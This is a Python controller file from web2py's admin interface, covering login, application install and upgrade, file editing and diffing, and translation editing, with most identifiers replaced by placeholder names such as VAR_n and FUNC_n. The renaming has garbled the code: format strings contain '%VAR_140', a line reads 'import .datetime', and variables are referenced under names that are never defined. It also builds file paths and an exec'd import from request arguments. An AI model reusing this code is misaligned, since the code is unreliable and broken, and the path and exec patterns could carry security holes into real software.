FUNC_2(VAR_20, 'a').write(
'[%VAR_140] %VAR_140 %VAR_140: %s\n' % (VAR_21, VAR_4, VAR_5, VAR_6))
def FUNC_2(VAR_7, VAR_8):
if (DEMO_MODE or is_gae) and ('w' in VAR_8 or 'a' in VAR_8):
class CLASS_2:
def FUNC_64(self, VAR_2):
pass
def FUNC_65(self):
pass
return CLASS_2()
if PY2 or 'b' in VAR_8:
return open(VAR_7, VAR_8)
else:
return open(VAR_7, VAR_8, encoding="utf8")
def FUNC_3(VAR_7, VAR_8='r'):
VAR_22 = FUNC_2(VAR_7, VAR_8)
try:
return VAR_22.read()
finally:
VAR_22.close()
def FUNC_4(VAR_7, VAR_9, VAR_8='w'):
VAR_22 = FUNC_2(VAR_7, VAR_8)
try:
VAR_22.write(VAR_9)
finally:
VAR_22.close()
def FUNC_5(VAR_10=None):
VAR_3 = VAR_10 or request.args(0)
if (VAR_3 and os.path.exists(apath(VAR_3, VAR_122=request)) and
(not MULTI_USER_MODE or is_manager() or
db(db.app.name == VAR_3)(db.app.owner == auth.user.id).count())):
return VAR_3
session.flash = T('App does not exist or you are not authorized')
redirect(URL('site'))
def VAR_197():
VAR_23 = prevent_open_redirect(request.vars.send)
if DEMO_MODE:
session.authorized = True
session.last_time = t0
if not VAR_23:
send = URL('site')
if session.authorized:
redirect(VAR_23)
elif failed_login_count() >= allowed_number_of_attempts:
time.sleep(2 ** allowed_number_of_attempts)
raise HTTP(403)
elif request.vars.password:
if verify_password(request.vars.password[:1024]):
session.authorized = True
login_record(True)
if CHECK_VERSION:
session.check_version = True
else:
session.check_version = False
session.last_time = t0
if isinstance(VAR_23, list): # ## why does this happen?
VAR_23 = str(VAR_23[0])
redirect(VAR_23)
else:
VAR_210 = login_record(False)
if VAR_210 >= allowed_number_of_attempts:
VAR_43.flash = \
T('admin disabled because too many invalid login attempts')
elif VAR_210 == allowed_number_of_attempts - 1:
VAR_43.flash = \
T('You have one more login attempt before you are locked out')
else:
VAR_43.flash = T('invalid password.')
return dict(VAR_23=send)
def FUNC_7():
session.forget()
session._unlock(VAR_43)
VAR_24, VAR_25 = check_new_version(request.env.web2py_version,
WEB2PY_VERSION_URL)
if VAR_24 in (-1, -2):
return A(T('Unable to check for upgrades'), _href=WEB2PY_URL)
elif not VAR_24:
return A(T('web2py is up to date'), _href=WEB2PY_URL)
elif platform.system().lower() in ('windows', 'win32', 'win64') and os.path.exists("web2py.exe"):
return SPAN('You should upgrade to %s' % VAR_25.split('(')[0])
else:
return sp_button(URL('upgrade_web2py'), T('upgrade VAR_21 to %s') % VAR_25.split('(')[0])
def FUNC_8():
session.authorized = None
if MULTI_USER_MODE:
redirect(URL('user/logout'))
redirect(URL('index'))
def FUNC_9():
if session.pam_user:
session.flash = T(
'PAM authenticated FUNC_50, cannot change password here')
redirect(URL('site'))
VAR_26 = SQLFORM.factory(Field('current_admin_password', 'password'),
Field('new_admin_password',
'password', requires=IS_STRONG()),
Field('new_admin_password_again', 'password'),
VAR_144="span4 well")
if VAR_26.accepts(request.vars):
if not verify_password(request.vars.current_admin_password):
VAR_26.errors.current_admin_password = T('invalid password')
elif VAR_26.vars.new_admin_password != VAR_26.vars.new_admin_password_again:
VAR_26.errors.new_admin_password_again = T('no match')
else:
VAR_15 = abspath('parameters_%VAR_140.py' % request.env.server_port)
FUNC_4(VAR_15, 'password="%s"' % CRYPT()(
request.vars.new_admin_password)[0])
session.flash = T('password changed')
redirect(URL('site'))
return dict(VAR_26=form)
def FUNC_10():
VAR_27 = request.env.web2py_version
VAR_28 = 'file' in request.vars or 'appurl' in request.vars
class CLASS_1(object):
def __call__(self, VAR_9):
if not re.compile('^\w+$').match(VAR_9):
return (VAR_9, T('Invalid application name'))
if not request.vars.overwrite and \
os.path.exists(os.path.join(apath(VAR_122=request), VAR_9)):
return (VAR_9, T('Application exists already'))
return (VAR_9, None)
VAR_29 = CLASS_1()
VAR_30 = SQLFORM.factory(Field('name', requires=VAR_29),
table_name='appcreate')
VAR_31 = SQLFORM.factory(Field('name', requires=VAR_29),
Field('file', 'upload', uploadfield=False),
Field('url'),
Field('overwrite', 'boolean'),
table_name='appupdate')
VAR_30.process()
VAR_31.process()
if DEMO_MODE:
pass
elif VAR_30.accepted:
VAR_174 = cleanpath(VAR_30.vars.name)
VAR_175, VAR_125 = app_create(VAR_174, request, info=True)
if VAR_175:
if MULTI_USER_MODE:
db.app.insert(VAR_10=VAR_174, owner=auth.user.id)
FUNC_1(VAR_174)
session.flash = T('new application "%s" created', VAR_174)
gluon.rewrite.load()
redirect(URL('design', VAR_98=VAR_174))
else:
session.flash = \
DIV(T('unable to create application "%s"', VAR_174),
PRE(VAR_125))
redirect(URL(VAR_122=request))
elif VAR_31.accepted:
if (VAR_31.vars.url or '').endswith('.git'):
if not VAR_19:
session.flash = VAR_117
redirect(URL(VAR_122=request))
VAR_211 = os.path.join(apath(VAR_122=request), VAR_31.vars.name)
try:
VAR_217 = git.Repo.clone_from(VAR_31.vars.url, VAR_211)
session.flash = T('new application "%s" imported',
VAR_31.vars.name)
gluon.rewrite.load()
except git.GitCommandError as err:
session.flash = T('Invalid git repository specified.')
redirect(URL(VAR_122=request))
elif VAR_31.vars.url:
try:
VAR_221 = urlopen(VAR_31.vars.url)
if VAR_221.code == 404:
raise Exception("404 VAR_16 not found")
except Exception as VAR_114:
session.flash = \
DIV(T('Unable to download VAR_3 because:'), PRE(repr(VAR_114)))
redirect(URL(VAR_122=request))
VAR_120 = VAR_31.vars.url
elif VAR_31.accepted and VAR_31.vars.file:
VAR_120 = request.vars.file.filename
VAR_221 = request.vars.file.file
else:
session.flash = 'No VAR_16 uploaded and no URL specified'
redirect(URL(VAR_122=request))
if VAR_221:
VAR_174 = cleanpath(VAR_31.vars.name)
VAR_212 = app_install(VAR_174, VAR_221,
request, VAR_120,
overwrite=VAR_31.vars.overwrite)
if VAR_221 and VAR_212:
VAR_155 = 'application %(VAR_174)VAR_140 VAR_212 with md5sum: %(digest)s'
if MULTI_USER_MODE:
db.app.insert(VAR_10=VAR_174, owner=auth.user.id)
FUNC_1(VAR_174)
session.flash = T(VAR_155, dict(VAR_174=appname,
digest=md5_hash(VAR_212)))
gluon.rewrite.load()
else:
VAR_155 = 'unable to install application "%(VAR_174)s"'
session.flash = T(VAR_155, dict(VAR_174=VAR_31.vars.name))
redirect(URL(VAR_122=request))
VAR_32 = re.compile('^\w+$')
if is_manager():
VAR_33 = [VAR_7 for VAR_7 in os.listdir(apath(VAR_122=request)) if VAR_32.match(VAR_7) and
VAR_7 != '__pycache__']
else:
VAR_33 = [VAR_7.name for VAR_7 in db(db.app.owner == auth.user_id).select()]
if FILTER_APPS:
VAR_33 = [VAR_7 for VAR_7 in VAR_33 if VAR_7 in FILTER_APPS]
VAR_33 = sorted(VAR_33, VAR_143=lambda VAR_7: a.upper())
VAR_34 = platform.python_version()
return dict(VAR_3=None, VAR_33=apps, VAR_27=myversion, VAR_34=myplatform,
VAR_30=form_create, VAR_31=form_update)
def FUNC_11(VAR_3):
import .datetime
VAR_20 = os.path.join(apath(VAR_3, VAR_122=request), 'progress.log')
VAR_32 = re.compile('\[(.*?)\][^\:]+\:\VAR_140+(\-?\VAR_68+)')
if not os.path.exists(VAR_20):
return []
VAR_35 = VAR_32.findall(open(VAR_20, 'r').read())
VAR_36, VAR_37 = [], 0
for VAR_156 in VAR_35:
if not VAR_156:
continue
VAR_118 = -(request.now - datetime.datetime.strptime(VAR_156[0],
'%Y-%VAR_156-%VAR_68 %H:%M:%S')).days
VAR_37 += int(VAR_156[1])
VAR_36.append([VAR_118, VAR_37])
return VAR_36
def FUNC_12():
VAR_3 = FUNC_5()
try:
if len(request.args) == 1:
VAR_120 = 'web2py.app.%VAR_140.w2p' % VAR_3
VAR_5 = app_pack(VAR_3, request, raise_ex=True)
else:
VAR_120 = 'web2py.app.%VAR_140.compiled.w2p' % VAR_3
VAR_5 = app_pack_compiled(VAR_3, request, raise_ex=True)
except Exception as VAR_114:
VAR_176 = VAR_114
VAR_5 = None
if VAR_5:
VAR_43.headers['Content-Type'] = 'application/w2p'
VAR_119 = 'attachment; VAR_5=%s' % VAR_120
VAR_43.headers['Content-Disposition'] = VAR_119
return FUNC_3(VAR_5, 'rb')
else:
session.flash = T('internal VAR_125: %s', VAR_176)
redirect(URL('site'))
def FUNC_13():
VAR_3 = FUNC_5()
if len(request.args) == 2:
VAR_120 = 'web2py.plugin.%VAR_140.w2p' % request.args[1]
VAR_5 = plugin_pack(VAR_3, request.args[1], request)
if VAR_5:
VAR_43.headers['Content-Type'] = 'application/w2p'
VAR_119 = 'attachment; VAR_5=%s' % VAR_120
VAR_43.headers['Content-Disposition'] = VAR_119
return FUNC_3(VAR_5, 'rb')
else:
session.flash = T('internal error')
redirect(URL('plugin', VAR_98=request.args))
def FUNC_14(VAR_3, VAR_11, VAR_12=None):
import .urllib
import .zipfile
VAR_38 = 'http://www.web2py.com/examples/static/VAR_40.zip'
VAR_39 = StringIO()
VAR_39.write(urlopen(VAR_38).read())
VAR_40 = zipfile.ZipFile(VAR_39, VAR_4='a')
VAR_41 = u'# -*- coding: utf-8 -*-\nrouters = dict(BASE=dict(default_application="%s"))' % VAR_3
VAR_40.writestr('web2py/VAR_41.py', VAR_41.encode('utf-8'))
VAR_42 = os.path.dirname(VAR_11)
for VAR_5 in VAR_12:
VAR_120 = os.path.join(VAR_11, VAR_5)
VAR_121 = os.path.join('web2py/applications', VAR_3, VAR_5)
VAR_40.write(VAR_120, VAR_121)
VAR_40.close()
VAR_43.headers['Content-Type'] = 'application/zip'
VAR_43.headers['Content-Disposition'] = 'attachment; VAR_5=web2py.app.%VAR_140.zip' % VAR_3
VAR_39.seek(0)
return VAR_43.stream(VAR_39)
def FUNC_15():
VAR_3 = FUNC_5()
VAR_11 = apath(VAR_3, VAR_122=request)
def FUNC_58(VAR_44):
return [VAR_221 for VAR_221 in VAR_44 if not (
VAR_221[:1] in '#' or VAR_221.endswith('~') or VAR_221.endswith('.bak'))]
VAR_45 = {}
for (VAR_122, VAR_68, VAR_221) in os.walk(VAR_11):
VAR_45[VAR_122] = {'folders': FUNC_58(VAR_68), 'files': FUNC_58(VAR_221)}
if request.post_vars.file:
VAR_123 = set(os.path.relpath(os.path.join(VAR_122, VAR_221), VAR_11) for VAR_122 in VAR_45 for VAR_221 in VAR_45[VAR_122]['files'])
VAR_45 = request.post_vars.file
VAR_45 = [files] if not isinstance(VAR_45, list) else VAR_45
VAR_45 = [VAR_16 for VAR_16 in VAR_45 if VAR_16 in VAR_123]
if request.post_vars.doexe is None:
VAR_120 = 'web2py.app.%VAR_140.w2p' % VAR_3
try:
VAR_5 = app_pack(VAR_3, request, raise_ex=True, VAR_12=VAR_45)
except Exception as VAR_114:
VAR_5 = None
if VAR_5:
VAR_43.headers['Content-Type'] = 'application/w2p'
VAR_119 = 'attachment; VAR_5=%s' % VAR_120
VAR_43.headers['Content-Disposition'] = VAR_119
return FUNC_3(VAR_5, 'rb')
else:
session.flash = T('internal VAR_125: %s', VAR_114)
redirect(URL(VAR_98=request.args))
else:
return FUNC_14(VAR_3, VAR_11, VAR_45)
return locals()
def FUNC_16():
VAR_46 = FORM.confirm(T('Upgrade'),
{T('Cancel'): URL('site')})
if VAR_46.accepted:
(VAR_124, VAR_125) = upgrade(request)
if VAR_124:
session.flash = T('web2py upgraded; please restart it')
else:
session.flash = T('unable to upgrade because "%s"', VAR_125)
redirect(URL('site'))
return dict(VAR_46=dialog)
def FUNC_17():
VAR_3 = FUNC_5()
VAR_46 = FORM.confirm(T('Uninstall'),
{T('Cancel'): URL('site')})
VAR_46['_id'] = 'confirm_form'
VAR_46['_class'] = 'well'
for VAR_126 in VAR_46.components:
VAR_126['_class'] = 'btn'
if VAR_46.accepted:
if MULTI_USER_MODE:
if is_manager() and db(db.app.name == VAR_3).delete():
pass
elif db(db.app.name == VAR_3)(db.app.owner == auth.user.id).delete():
pass
else:
session.flash = T('no permission to FUNC_17 "%s"', VAR_3)
redirect(URL('site'))
try:
VAR_5 = app_pack(VAR_3, request, raise_ex=True)
except:
session.flash = T('unable to FUNC_17 "%s"', VAR_3)
else:
if app_uninstall(VAR_3, request):
session.flash = T('application "%s" uninstalled', VAR_3)
else:
session.flash = T('unable to FUNC_17 "%s"', VAR_3)
redirect(URL('site'))
return dict(VAR_3=VAR_3, VAR_46=dialog)
def FUNC_18():
VAR_3 = FUNC_5()
VAR_47 = app_cleanup(VAR_3, request)
if not VAR_47:
session.flash = T("some VAR_45 could not be removed")
else:
session.flash = T('cache, FUNC_42 and sessions cleaned')
redirect(URL('site'))
def FUNC_19():
VAR_3 = FUNC_5()
VAR_48 = app_compile(VAR_3, request,
skip_failed_views=(request.args(1) == 'skip_failed_views'))
if not VAR_48:
session.flash = T('application compiled')
elif isinstance(VAR_48, list):
session.flash = DIV(*[T('application compiled'), BR(), BR(),
T('WARNING: The following VAR_84 could not be compiled:'), BR()] +
[CAT(BR(), VAR_182) for VAR_182 in VAR_48] +
[BR(), BR(), T('DO NOT use the "Pack compiled" feature.')])
else:
session.flash = DIV(T('Cannot compile: there are FUNC_42 in your VAR_3:'),
CODE(VAR_48))
redirect(URL('site'))
def FUNC_20():
VAR_3 = FUNC_5()
remove_compiled_application(apath(VAR_3, VAR_122=request))
session.flash = T('compiled application removed')
redirect(URL('site'))
def FUNC_21():
VAR_3 = FUNC_5()
VAR_5 = '/'.join(request.args)
VAR_49 = request.vars.sender
if isinstance(VAR_49, list): # ## fix VAR_7 problem with Vista
VAR_49 = sender[0]
VAR_46 = FORM.confirm(T('Delete'),
{T('Cancel'): URL(VAR_49, VAR_157=request.vars.id)})
if VAR_46.accepted:
try:
VAR_177 = apath(VAR_5, VAR_122=request)
VAR_160 = FUNC_0(open(VAR_177, 'r').read())
os.unlink(VAR_177)
FUNC_1(VAR_3, 'DELETE', VAR_5, VAR_6=-VAR_160)
session.flash = T('file "%(VAR_5)s" deleted',
dict(VAR_5=filename))
except Exception:
session.flash = T('unable to FUNC_21 VAR_16 "%(VAR_5)s"',
dict(VAR_5=filename))
redirect(URL(VAR_49, VAR_157=request.vars.id2))
return dict(VAR_46=dialog, VAR_5=filename)
def FUNC_22():
if not URL.verify(request, hmac_key=session.hmac_key): raise HTTP(401)
VAR_3 = FUNC_5()
VAR_5 = os.path.join(apath(VAR_3, VAR_122=request), 'DISABLED')
if is_gae:
return SPAN(T('Not supported'), _style='color:yellow')
elif os.path.exists(VAR_5):
os.unlink(VAR_5)
return SPAN(T('Disable'), _style='color:green')
else:
if PY2:
FUNC_2(VAR_5, 'wb').write('disabled: True\ntime-disabled: %s' % request.now)
else:
VAR_200 = 'disabled: True\ntime-disabled: %s' % request.now
FUNC_2(VAR_5, 'wb').write(VAR_200.encode('utf-8'))
return SPAN(T('Enable'), _style='color:red')
def FUNC_23():
VAR_3 = FUNC_5(request.vars.app)
VAR_5 = '/'.join(request.args)
if request.vars.app:
VAR_15 = abspath(VAR_5)
else:
VAR_15 = apath(VAR_5, VAR_122=request)
try:
VAR_2 = FUNC_3(VAR_15).replace('\r', '')
except IOError:
session.flash = T('file does not exist')
redirect(URL('site'))
VAR_50 = VAR_5[filename.rfind('.') + 1:].lower()
return dict(VAR_3=app,
VAR_5=filename,
VAR_2=data,
VAR_50=extension)
def FUNC_24():
VAR_3 = FUNC_5()
if len(request.args) > 1:
VAR_16 = request.args[1]
else:
VAR_16 = '.*\.py'
VAR_51 = listdir(
apath('%VAR_140/VAR_51/' % VAR_3, VAR_122=request), VAR_16 + '$')
return dict(VAR_3=VAR_3, VAR_51=controllers)
def FUNC_25():
return ''
def FUNC_26():
VAR_52 = request.vars.keywords or ''
VAR_3 = FUNC_5()
def FUNC_59(VAR_5, VAR_52):
VAR_5 = os.path.join(apath(VAR_3, VAR_122=request), VAR_5)
if VAR_52 in read_file(VAR_5, 'r'):
return True
return False
VAR_15 = apath(request.args[0], VAR_122=request)
VAR_53 = glob(os.path.join(VAR_15, '*/*.py'))
VAR_54 = glob(os.path.join(VAR_15, '*/*.html'))
VAR_55 = glob(os.path.join(VAR_15, '*/*/*.html'))
VAR_45 = [x[len(VAR_15) + 1:].replace(
'\\', '/') for x in VAR_53 + VAR_54 + VAR_55 if FUNC_59(x, VAR_52)]
return VAR_43.json(dict(VAR_45=files, message=T.M('Searching: **%VAR_140** %%{VAR_16}', len(VAR_45))))
def FUNC_27():
VAR_3 = FUNC_5(request.vars.app)
VAR_56 = apath(VAR_3, VAR_122=request)
VAR_57 = {'theme': 'web2py', 'editor': 'default', 'closetag': 'true', 'codefolding': 'false', 'tabwidth': '4', 'indentwithtabs': 'false', 'linenumbers': 'true', 'highlightline': 'true'}
VAR_58 = Config(os.path.join(request.folder, 'settings.cfg'),
section='editor', default_values={})
VAR_57.update(VAR_58.read())
if not(request.ajax) and not(is_mobile):
VAR_43.title = T('Editing %s') % VAR_3
return VAR_43.render('default/FUNC_27.html', dict(VAR_3=VAR_3, editor_settings=VAR_57))
if 'settings' in request.vars:
if request.post_vars: # save new VAR_57
if PY2:
VAR_201 = request.post_vars.items()
else:
VAR_201 = list(request.post_vars.items())
VAR_201 += [(opt, 'false') for opt in VAR_57 if opt not in request.post_vars]
if VAR_58.save(VAR_201):
VAR_43.headers["web2py-VAR_126-flash"] = T('Preferences saved correctly')
else:
VAR_43.headers["web2py-VAR_126-flash"] = T('Preferences saved on session only')
VAR_43.headers["web2py-VAR_126-command"] = "update_editor(%VAR_140);$('a[href=#editor_settings] button.close').click();" % VAR_43.json(VAR_58.read())
return
else:
VAR_178 = {'realfilename': 'settings', 'filename': 'settings', 'id': 'editor_settings', 'force': False}
VAR_178['plain_html'] = VAR_43.render('default/editor_settings.html', {'editor_settings': VAR_57})
return VAR_43.json(VAR_178)
""" File FUNC_27 handler """
VAR_3 = FUNC_5(request.vars.app)
VAR_5 = '/'.join(request.args)
VAR_59 = request.args[-1]
if request.vars.app:
VAR_15 = abspath(VAR_5)
else:
VAR_15 = apath(VAR_5, VAR_122=request)
if VAR_5[-3:] == '.py':
VAR_127 = 'python'
elif VAR_5[-5:] == '.html':
VAR_127 = 'html'
elif VAR_5[-5:] == '.load':
VAR_127 = 'html'
elif VAR_5[-4:] == '.css':
VAR_127 = 'css'
elif VAR_5[-3:] == '.js':
VAR_127 = 'javascript'
else:
VAR_127 = 'html'
if ('revert' in request.vars) and os.path.exists(VAR_15 + '.bak'):
try:
VAR_2 = FUNC_3(VAR_15 + '.bak')
VAR_179 = FUNC_3(VAR_15)
except IOError:
session.flash = T('Invalid action')
if 'from_ajax' in request.vars:
return VAR_43.json({'error': str(T('Invalid action'))})
else:
redirect(URL('site'))
FUNC_4(VAR_15, VAR_2)
VAR_128 = md5_hash(VAR_2)
VAR_129 = time.ctime(os.stat(VAR_15)[stat.ST_MTIME])
FUNC_4(VAR_15 + '.bak', VAR_179)
VAR_43.flash = T('file "%s" of %VAR_140 restored', (VAR_5, VAR_129))
else:
try:
VAR_2 = FUNC_3(VAR_15)
except IOError:
session.flash = T('Invalid action')
if 'from_ajax' in request.vars:
return VAR_43.json({'error': str(T('Invalid action'))})
else:
redirect(URL('site'))
VAR_130 = FUNC_0(VAR_2)
VAR_128 = md5_hash(VAR_2)
VAR_129 = time.ctime(os.stat(VAR_15)[stat.ST_MTIME])
if request.vars.file_hash and request.vars.file_hash != VAR_128:
session.flash = T('file changed on disk')
VAR_2 = request.vars.data.replace('\VAR_122\n', '\n').strip() + '\n'
FUNC_4(VAR_15 + '.1', VAR_2)
if 'from_ajax' in request.vars:
return VAR_43.json({'error': str(T('file changed on disk')),
'redirect': URL('resolve',
VAR_98=request.args)})
else:
redirect(URL('resolve', VAR_98=request.args))
elif request.vars.data:
FUNC_4(VAR_15 + '.bak', VAR_2)
VAR_2 = request.vars.data.replace('\VAR_122\n', '\n').strip() + '\n'
FUNC_4(VAR_15, VAR_2)
VAR_202 = FUNC_0(VAR_2)
FUNC_1(
VAR_3, 'EDIT', VAR_5, VAR_6=VAR_202 - VAR_130)
VAR_128 = md5_hash(VAR_2)
VAR_129 = time.ctime(os.stat(VAR_15)[stat.ST_MTIME])
VAR_43.flash = T('file saved on %s', VAR_129)
VAR_60 = (request.vars.data or request.vars.revert)
VAR_61 = None
if VAR_127 == 'python' and request.vars.data:
import _ast
try:
VAR_180 = request.vars.data.rstrip().replace('\VAR_122\n', '\n') + '\n'
compile(VAR_180, VAR_15, "exec", _ast.PyCF_ONLY_AST)
except Exception as VAR_114:
VAR_203 = sum([len(VAR_69) + 1 for l, VAR_69
in enumerate(request.vars.data.split("\n"))
if l < VAR_114.lineno - 1])
if VAR_114.text and VAR_114.offset:
VAR_213 = VAR_114.offset - (len(VAR_114.text) - len(
VAR_114.text.splitlines()[-1]))
else:
VAR_213 = 0
VAR_61 = {'start': VAR_203, 'end': VAR_203 +
VAR_213 + 1, 'lineno': VAR_114.lineno, 'offset': VAR_213}
try:
VAR_214 = VAR_114.__class__.__name__
except:
VAR_214 = 'unknown exception!'
VAR_43.flash = DIV(T('failed to compile VAR_16 because:'), BR(),
B(VAR_214), ' ' + T('at VAR_69 %s', VAR_114.lineno),
VAR_213 and ' ' +
T('at char %s', VAR_213) or '',
PRE(repr(VAR_114)))
if VAR_60 and request.args[1] == 'modules':
try:
VAR_181 = '.'.join(request.args[2:])[:-3]
exec('import .applications.%VAR_140.modules.%s' % (
request.args[0], VAR_181))
reload(sys.modules['applications.%VAR_140.modules.%s'
% (request.args[0], VAR_181)])
except Exception as VAR_114:
VAR_43.flash = DIV(
T('failed to reload module because:'), PRE(repr(VAR_114)))
VAR_62 = None
VAR_63 = None
VAR_64 = None
if VAR_127 == 'html' and len(request.args) >= 3:
VAR_131 = os.path.join(request.args[0], 'controllers',
request.args[2] + '.py')
if os.path.exists(apath(VAR_131, VAR_122=request)):
VAR_62 = URL('edit', VAR_98=[VAR_131.replace(os.sep, "/")])
VAR_182 = request.args[3].replace('.html', '')
VAR_64 = URL(request.args[0], request.args[2], VAR_182)
elif VAR_127 == 'python' and request.args[1] == 'controllers':
VAR_3 = FUNC_5()
VAR_183 = os.path.splitext(request.args[2])[0]
VAR_184 = os.path.join(VAR_3, 'views', VAR_183)
VAR_185 = apath(VAR_184, VAR_122=request)
VAR_186 = []
if os.path.exists(VAR_185):
if os.path.isdir(VAR_185):
VAR_186 = glob(os.path.join(VAR_185, '*.html'))
elif os.path.exists(VAR_185 + '.html'):
VAR_186.append(VAR_185 + '.html')
if len(VAR_186):
VAR_63 = []
for v in sorted(VAR_186):
VAR_215 = os.path.split(v)[-1]
VAR_216 = "/".join([VAR_184.replace(os.sep, "/"), VAR_215])
VAR_63.append(A(VAR_215.split(".")[0],
VAR_144="editor_filelink",
_href=URL('edit', VAR_98=[VAR_216])))
if len(request.args) > 2 and request.args[1] == 'controllers':
VAR_132 = (request.args[2])[:-3]
try:
VAR_83 = find_exposed_functions(VAR_2)
VAR_83 = functions and sorted(VAR_83) or []
except SyntaxError as err:
VAR_83 = ['SyntaxError:Line:%d' % err.lineno]
else:
(VAR_132, VAR_83) = (None, None)
if 'from_ajax' in request.vars:
return VAR_43.json({'file_hash': VAR_128, 'saved_on': VAR_129, 'functions': VAR_83, 'controller': VAR_132, 'application': request.args[0], 'highlight': VAR_61})
else:
VAR_133 = dict(VAR_3=request.args[0],
VAR_160=request.vars.lineno or 1,
editor_settings=VAR_57,
VAR_5=filename,
VAR_59=realfilename,
VAR_127=filetype,
VAR_2=data,
VAR_62=edit_controller,
VAR_128=file_hash,
VAR_129=saved_on,
VAR_132=controller,
VAR_83=functions,
VAR_64=view_link,
VAR_63=editviewlinks,
id=IS_SLUG()(VAR_5)[0],
force=True if (request.vars.restore or
request.vars.revert) else False)
VAR_134 = VAR_43.render('default/edit_js.html', VAR_133)
file_details['plain_html'] = VAR_134
if is_mobile:
return VAR_43.render('default.mobile/FUNC_27.html',
VAR_133, editor_settings=VAR_57)
else:
return VAR_43.json(VAR_133)
def FUNC_28():
VAR_3 = request.vars.app or ''
VAR_56 = apath('%(VAR_3)s' % {'app': VAR_3}, VAR_122=request)
VAR_65 = ['models', 'controllers', 'modules', 'private']
def FUNC_38(VAR_3, VAR_13, VAR_14='.*\.py$'):
VAR_45 = sorted(listdir(apath('%(VAR_3)VAR_140/%(VAR_13)VAR_140/' % {'app': VAR_3, 'dir': VAR_13}, VAR_122=request), VAR_14))
VAR_45 = [x.replace(os.path.sep, '/') for x in VAR_45 if not x.endswith('.bak')]
return VAR_45
VAR_66 = '#\VAR_140*(todo)+\VAR_140+(.*)'
VAR_32 = re.compile(VAR_66, re.IGNORECASE)
VAR_67 = []
for VAR_68 in VAR_65:
for VAR_221 in FUNC_38(VAR_3, VAR_68):
VAR_35 = []
VAR_5 = apath(os.path.join(VAR_3, VAR_68, VAR_221), VAR_122=request)
with FUNC_2(VAR_5, 'r') as f_s:
VAR_204 = f_s.read()
for VAR_156 in VAR_32.finditer(VAR_204):
VAR_203 = VAR_156.start()
VAR_160 = VAR_204.count('\n', 0, VAR_203) + 1
VAR_35.append({'text': VAR_156.group(0), 'lineno': VAR_160})
if len(VAR_35) != 0:
VAR_67.append({'filename': VAR_221, 'matches': VAR_35, 'dir': VAR_68})
return {'todo': VAR_67, 'app': VAR_3}
def FUNC_29():
VAR_58 = Config(os.path.join(request.folder, 'settings.cfg'),
section='editor_sessions', default_values={})
VAR_57 = VAR_58.read()
if request.vars.session_name and request.vars.files:
VAR_135 = request.vars.session_name
VAR_45 = request.vars.files
VAR_57.update({VAR_135: ','.join(VAR_45)})
if VAR_58.save(VAR_57.items()):
VAR_43.headers["web2py-VAR_126-flash"] = T('Session saved correctly')
else:
VAR_43.headers["web2py-VAR_126-flash"] = T('Session saved on session only')
return VAR_43.render('default/FUNC_29.html', {'editor_sessions': VAR_57})
def FUNC_30():
VAR_5 = '/'.join(request.args)
VAR_15 = apath(VAR_5, VAR_122=request)
VAR_7 = FUNC_3(VAR_15).split('\n')
try:
VAR_8 = FUNC_3(VAR_15 + '.1').split('\n')
except IOError:
session.flash = 'Other VAR_16, no longer there'
redirect(URL('edit', VAR_98=request.args))
VAR_68 = difflib.ndiff(VAR_7, VAR_8)
def FUNC_60(VAR_69):
VAR_136 = ''
for (VAR_145, VAR_48) in enumerate(VAR_69):
if VAR_48 == ' ':
VAR_136 += ' '
elif VAR_48 == ' \t':
VAR_136 += ' '
elif VAR_145 == 0 and VAR_48 == '?':
pass
else:
break
return XML(VAR_136)
def FUNC_61(VAR_70):
VAR_137 = {' ': 'normal', '+': 'plus', '-': 'minus'}
return VAR_137[VAR_70[0]]
if request.vars:
VAR_48 = '\n'.join([VAR_70[2:].rstrip() for (VAR_111, VAR_70) in enumerate(VAR_68) if VAR_70[0]
== ' ' or 'line%i' % VAR_111 in request.vars])
FUNC_4(VAR_15, VAR_48)
session.flash = 'files merged'
redirect(URL('edit', VAR_98=request.args))
else:
VAR_138 = lambda VAR_197, VAR_70: not VAR_70[:1] in ['+', '-'] and "" \
or INPUT(_type='checkbox',
_name='line%i' % VAR_197,
VAR_9=VAR_70[0] == '+')
VAR_139 = TABLE(*[TR(TD(VAR_138(VAR_111, VAR_70)),
TD(VAR_70[0]),
TD(FUNC_60(VAR_70[2:]),
TT(VAR_70[2:].rstrip())),
VAR_144=FUNC_61(VAR_70))
for (VAR_111, VAR_70) in enumerate(VAR_68) if VAR_70[0] != '?'])
return dict(VAR_139=diff, VAR_5=filename)
def FUNC_31():
VAR_3 = FUNC_5()
VAR_5 = '/'.join(request.args)
VAR_43.title = request.args[-1]
VAR_71 = read_dict(apath(VAR_5, VAR_122=request))
if '__corrupted__' in VAR_71:
VAR_26 = SPAN(VAR_71['__corrupted__'], VAR_144='error')
return dict(VAR_5=filename, VAR_26=form)
VAR_72 = sorted(VAR_71.keys(), VAR_143=lambda x: to_native(x).lower())
VAR_73 = []
rows.append(H2(T('Original/Translation')))
for VAR_143 in VAR_72:
VAR_10 = md5_hash(VAR_143)
VAR_140 = VAR_71[VAR_143]
(VAR_141, VAR_142, VAR_143) = key.partition('\x01')
if VAR_142:
VAR_141 = SPAN(VAR_141 + ': ', VAR_144='tm_ftag')
VAR_145 = VAR_143
else:
(VAR_145, VAR_141) = (VAR_141, '')
VAR_144 = 'untranslated' if VAR_145 == VAR_140 else 'translated'
if len(VAR_140) <= 40:
VAR_187 = INPUT(_type='text', _name=VAR_10, VAR_9=VAR_140,
_size=70, VAR_144=_class)
else:
VAR_187 = TEXTAREA(_name=VAR_10, VAR_9=VAR_140, _cols=70,
_rows=5, VAR_144=_class)
VAR_145 = (VAR_140 != VAR_145) and VAR_145 or B(VAR_145)
VAR_146 = DIV(LABEL(VAR_141, VAR_145, _style="font-weight:normal;"),
CAT(VAR_187, '\n', TAG.BUTTON(
T('delete'),
_onclick='return delkey("%s")' % VAR_10,
VAR_144='btn')), _id=VAR_10, VAR_144='span6 well well-small')
VAR_73.append(DIV(VAR_146, VAR_144="row-fluid"))
VAR_73.append(DIV(INPUT(_type='submit', _value=T('update'), VAR_144="btn btn-primary"), VAR_144='controls'))
VAR_26 = FORM(*VAR_73)
if VAR_26.accepts(request.vars, keepvalues=True):
VAR_147 = dict()
for VAR_143 in VAR_72:
VAR_10 = md5_hash(VAR_143)
if VAR_26.vars[VAR_10] == chr(127):
continue
VAR_147[VAR_143] = VAR_26.vars[VAR_10]
write_dict(apath(VAR_5, VAR_122=request), VAR_147)
session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
redirect(URL(VAR_122=request, VAR_98=request.args))
return dict(VAR_3=request.args[0], VAR_5=filename, VAR_26=form)
def FUNC_32():
VAR_3 = FUNC_5()
VAR_5 = '/'.join(request.args)
